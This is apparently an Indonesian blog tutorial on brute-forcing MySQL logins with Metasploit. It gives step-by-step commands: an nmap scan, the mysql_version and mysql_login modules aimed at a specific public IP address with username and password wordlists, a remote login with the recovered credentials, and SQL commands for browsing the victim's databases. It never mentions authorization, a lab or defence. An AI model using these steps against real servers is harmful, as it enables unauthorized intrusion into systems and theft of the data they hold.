Brute Force Attack MySQL With Metasploit

Metasploit adalah alat serba guna yang sangat mendukung untuk melakukan exploitasi, seperti pada artikel ini saya akan membagikan tips exploitasi data

MySQL Attack With Metasploit

Metasploit adalah alat serba guna yang sangat mendukung untuk melakukan exploitasi, seperti pada artikel ini saya akan membagikan tips exploitasi database dengan cara melakukan Brute Force pada MySQL dengan menggunakan Metasploit. Namun sebelum lanjut pastikan dulu kalian sudah menginstall metasploit di terminal silahkan download di url berikut ini jika belum menginstall metasploit https://www.metasploit.com.

Selain itu kalian juga membutuhkan tools Information Gathering seperti NMAP untuk melakukan port scanning sbelum melakukan Brute Force MySQL, Nmap sendiri memiliki banyak sekali fungsi bukan hanya sekedar untuk melakukan port scanning.

Pertama silahkan kalian buka nmap untuk melakukan port scanning, apakah terdapat service mysql yang berjalan pada server target atau tidak.

nmap website.com


Dalam gambar di atas terlihat jika port mysql 3306, kemudian kita lanjut jalankan metasploit dengan command berikut ini.

sudo msfconsole

use mysql_version

set RHOSTS 103.78.73.108

run

Kemudian seting juga module mysql_login untuk melakukan brute force terhadap mysql target dengan command berikut ini.

use mysql_login

set RHOSTS 103.78.73.108

set USERNAME root

Di bagian USERNAME kalian juga bisa menggunakan list username yang sudah kalian buat, atau memasukan username seperti di atas root atau yang lainnya. jika anda ingin menggunakan wordlist username maka seting dengan command berikut ini.

set USER_FILE /home/zidan/userlist.txt

Ganti /home/zidan/userlist.txt  dengan lokasi user list kalian.

set PASS_FILE /home/zidan/passlist.txt

Ganti /home/zidan/passlist.txt  dengan lokasi list password kalian.

Kemudian jalankan module dengan command di bawah ini.

run

Tunggu hingga metasploit melakukan tugasnya, jika success module akan otomatis berhenti dan menampilkan username dan juga password mysql. berikut ini gambaran contoh dari hasilnya.

Jika sudah mendapatkan username dan juga password mysql target sekarang tinggal kita lakukan remote mysql dari jarak jauh, namun jika kalian sudah mendapatkan halamn login mysql nya bagian ini di skip aja.

telnet ip 3306


mysql -u username -h 103.78.73.108 -p

kemudian jika remote mysql berhasil, hasilnya akan terlihat seperti pada gambar di bawah ini.

 

 

Jika seperti ini tinggal kalian oprek aja databasenya, atau jika kalian belum terlalu menguasai command mysql bisa saya bantu dengan beberapa command dasar di bawah ini.

show databases;

Command ini di gunakan untuk melihat nama database

 

use namadatabase

Command untuk masuk ke dalam database

 

show tables;

Digunakan untuk melihat nana tables yang ada di dalam batabase

 

select * from nama_columns;

Digunakan untuk melihat isi dari dalam columns database